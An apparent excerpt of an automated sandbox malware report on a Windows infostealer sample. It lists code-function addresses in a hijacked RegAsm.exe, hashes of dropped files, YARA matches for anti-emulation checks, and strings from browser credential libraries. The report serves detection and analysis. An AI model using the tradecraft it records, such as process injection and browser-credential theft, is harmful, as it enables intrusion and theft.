Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C206D90	2_2_6C206D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2FCDC0	2_2_6C2FCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C250E20	2_2_6C250E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20EE70	2_2_6C20EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F6E90	2_2_6C1F6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C17AEC0	2_2_6C17AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C210EC0	2_2_6C210EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C176F10	2_2_6C176F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B0F20	2_2_6C2B0F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C232F70	2_2_6C232F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1DEF40	2_2_6C1DEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B8FB0	2_2_6C2B8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C17EFB0	2_2_6C17EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C24EFF0	2_2_6C24EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C170FE0	2_2_6C170FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C0820	2_2_6C1C0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FA820	2_2_6C1FA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C244840	2_2_6C244840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2768E0	2_2_6C2768E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C6900	2_2_6C1C6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1A8960	2_2_6C1A8960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2009A0	2_2_6C2009A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C22A9A0	2_2_6C22A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2309B0	2_2_6C2309B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C28C9E0	2_2_6C28C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1A49F0	2_2_6C1A49F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C228A30	2_2_6C228A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C21EA00	2_2_6C21EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1ECA70	2_2_6C1ECA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1EEA80	2_2_6C1EEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C210BA0	2_2_6C210BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C276BE0	2_2_6C276BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FA430	2_2_6C1FA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D4420	2_2_6C1D4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C188460	2_2_6C188460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C29A480	2_2_6C29A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1B64D0	2_2_6C1B64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20A4D0	2_2_6C20A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C210570	2_2_6C210570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1C8540	2_2_6C1C8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C274540	2_2_6C274540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C2B8550	2_2_6C2B8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1D2560	2_2_6C1D2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1645B0	2_2_6C1645B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C23A5E0	2_2_6C23A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1FE5F0	2_2_6C1FE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1CC650	2_2_6C1CC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C20E6E0	2_2_6C20E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1946D0	2_2_6C1946D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1CE6E0	2_2_6C1CE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C1F0700	2_2_6C1F0700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_6C19A7D0	2_2_6C19A7D0
Source: C:\ProgramData\KKJEBAAECB.exe	Code function: 6_2_00C50B3A	6_2_00C50B3A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043681D	9_2_0043681D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040CC80	9_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040C69D	9_2_0040C69D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041E850	9_2_0041E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043B050	9_2_0043B050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042D056	9_2_0042D056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042285E	9_2_0042285E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00408870	9_2_00408870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00409810	9_2_00409810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00430035	9_2_00430035
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042E8D7	9_2_0042E8D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043E080	9_2_0043E080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004020AD	9_2_004020AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041F8B7	9_2_0041F8B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00436150	9_2_00436150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00420970	9_2_00420970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00415172	9_2_00415172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043F9E0	9_2_0043F9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042D9EB	9_2_0042D9EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00408190	9_2_00408190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043D9AD	9_2_0043D9AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004211B0	9_2_004211B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042C9B7	9_2_0042C9B7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00405A40	9_2_00405A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00429A49	9_2_00429A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00426206	9_2_00426206
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042BADA	9_2_0042BADA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042A2DC	9_2_0042A2DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004122E6	9_2_004122E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042E2AC	9_2_0042E2AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00420360	9_2_00420360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00411B6E	9_2_00411B6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00424B70	9_2_00424B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401330	9_2_00401330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00427B30	9_2_00427B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004323DD	9_2_004323DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004063E0	9_2_004063E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00407B80	9_2_00407B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040DB90	9_2_0040DB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043E390	9_2_0043E390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00425B9D	9_2_00425B9D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004223B5	9_2_004223B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043DC70	9_2_0043DC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00404C20	9_2_00404C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042F4C7	9_2_0042F4C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040D4D0	9_2_0040D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00435CD0	9_2_00435CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041A4EA	9_2_0041A4EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00433D5E	9_2_00433D5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040F578	9_2_0040F578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0040A500	9_2_0040A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042C521	9_2_0042C521
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00420D30	9_2_00420D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00431530	9_2_00431530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00428535	9_2_00428535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043D5DE	9_2_0043D5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041CDED	9_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00421DB5	9_2_00421DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042AE2B	9_2_0042AE2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0041E6C0	9_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043F6F0	9_2_0043F6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004306F7	9_2_004306F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00406E80	9_2_00406E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00436E82	9_2_00436E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00430EAE	9_2_00430EAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00401FC5	9_2_00401FC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00404FD0	9_2_00404FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00418FD5	9_2_00418FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_00402FE0	9_2_00402FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004357E0	9_2_004357E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0042EF89	9_2_0042EF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0043DF90	9_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_004237A0	9_2_004237A0
Source: C:\ProgramData\KJKJJJECFI.exe	Code function: 10_2_00840B44	10_2_00840B44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAC61E0	12_2_1DAC61E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAD3920	12_2_1DAD3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DACD100	12_2_1DACD100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DACFD50	12_2_1DACFD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAA9CC0	12_2_1DAA9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAAF8D0	12_2_1DAAF8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAA9430	12_2_1DAA9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAAA2C0	12_2_1DAAA2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DAD16D0	12_2_1DAD16D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB39F80	12_2_1DB39F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB1AEBE	12_2_1DB1AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB39A20	12_2_1DB39A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1DB39390	12_2_1DB39390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D954CF0	12_2_1D954CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D977810	12_2_1D977810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D959000	12_2_1D959000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D94EA80	12_2_1D94EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_1D9566C0	12_2_1D9566C0

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\KJKJJJECFI.exe 5923793C30ACF9026A872FCB8CE04A671FA194BB4F73EEF165D687AE97683047
Source: Joe Sandbox View	Dropped File: C:\ProgramData\KKJEBAAECB.exe 353871B38BB73FFB940B773C92849796C4C71949D5FFC9EA55103A8F41DABB74
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2FDAE0 appears 41 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C1094D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2F09D0 appears 172 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C199B10 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C0FCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004020FD appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041A3AC appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C193620 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C2FD930 appears 33 times

One or more processes crash

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 1760

PE / OLE file has an invalid certificate

Source: file.exe

Static PE information: invalid certificate

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000000.1637407171.0000000000900000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe
Source: file.exe, 00000000.00000002.1639431467.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameAUTOFMT.EXEj% vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.3c15570.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.3c15570.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: Process Memory Space: file.exe PID: 5356, type: MEMORYSTR	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KKJEBAAECB.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66d0cd8fb6f7b_lgjfd[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: KJKJJJECFI.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66d0cd9a65b5d_vqwergf[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/39@4/5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_6C127030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

2_2_6C127030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FD2A _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_0040FD2A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040F4A5 _EH_prolog,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,

2_2_0040F4A5

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\ProgramData\KJKJJJECFI.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2212

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.2145476514.000000002F62C000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000002.00000002.2127693534.0000000017504000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2161621926.000000006C2FF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2151278977.000000003B509000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2134032612.000000001D478000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, sql[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
